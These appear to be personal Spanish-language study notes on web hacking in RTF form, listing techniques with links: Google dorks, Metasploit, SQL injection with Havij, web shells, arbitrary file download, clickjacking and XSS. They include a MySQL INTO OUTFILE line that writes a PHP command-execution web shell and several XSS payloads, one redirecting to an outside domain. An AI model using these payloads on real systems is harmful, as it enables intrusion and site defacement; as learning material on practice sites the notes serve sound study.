{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;}
\margl1440\margr1440\vieww15380\viewh8400\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\fs24 \cf0 \

\fs96 NOTAS hacking Web by Felipe HP
\fs24 \
\
1.-Usar google para buscar dorks\
http://www.disoftin.com/2019/10/google-dorks-una-manera-facil-de-hacking.html\
\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf0 https://www.google.com/search?q=index+of+mp3+coldplay&oq=index+of+mp3++coldplay&aqs=chrome..69i57j33i160.15535j0j7&sourceid=chrome&ie=UTF-8\
\
\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf0 \
2.-indexar  una pagina para saber como esta construida\
http://ftp.icm.edu.pl/packages/mp3/3183/\
\
\
\
3.-Uso de {\field{\*\fldinst{HYPERLINK "https://www.wappalyzer.com/?utm_source=popup&utm_medium=extension&utm_campaign=wappalyzer"}}{\fldrslt 
\fs28\fsmilli14400 \cf2 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 }}
\fs28\fsmilli14400 \cf2 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2  Wappalyzer para identificar que tecnologias y ver posibles vulnerabilidades\
\
\
4.-Uso de exploits (MetaExploti)
\fs24 \cf0 \kerning1\expnd0\expndtw0 \outl0\strokewidth0 \
\
\
\
5.-Havij injection de sql\
https://www.hacksplaining.com/exercises/sql-injection\
\
\
\
\
6.-Modificar JS de la pagina para subir una Shell \
\
\
\
7.-Arbitrary File Download : Descarga arbitraria de ficheros/archivos"\
\
https://underc0de.org/foro/hacking/arbitrary-file-download/\
https://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html\
\
\
8.-web-scraping-php\
https://www.scrapingbee.com/blog/web-scraping-php/\
\
\
\
\
9.-Web Shell\
\
http://localhost/subirImages/subirImg.php\
https://github.com/fhernandezpalafox/shell-backdoor-list\
\
\
\
\
10.-Inyectar C\'f3digo desde Mysql \
\
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/Applications/XAMPP/xamppfiles/htdocs/shell.php"\
\
\
\
11.-  Clickjacking\
El clickjacking es una t\'e9cnica maliciosa para enga\'f1ar a usuarios de Internet con el fin de que revelen informaci\'f3n confidencial o tomar control de su ordenador cuando hacen clic en p\'e1ginas web aparentemente inocente\
\
\
https://www.hacksplaining.com/lessons\
\
\
\
12.- XSS\
\
http://xss-game.appspot.com/level1\
\
<script>alert('hola')</script>\
\
<marquee width=100 loop=100 onfinish=alert(1)>XSS</marquee>\
\
<script>window.location.href='hackeado.net'</script>\
\
<video controls><source src=validvideo.mp4 type=video/mp4><track default oncuechange=alert(1) src="data:text/vtt,WEBVTT FILE\
\
1\
00:00:00.000 --> 00:00:05.000 \
<b>XSS</b>\
"></video>\
\
\
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet\
\
\
<iframe src="javascript:alert(1)">\
}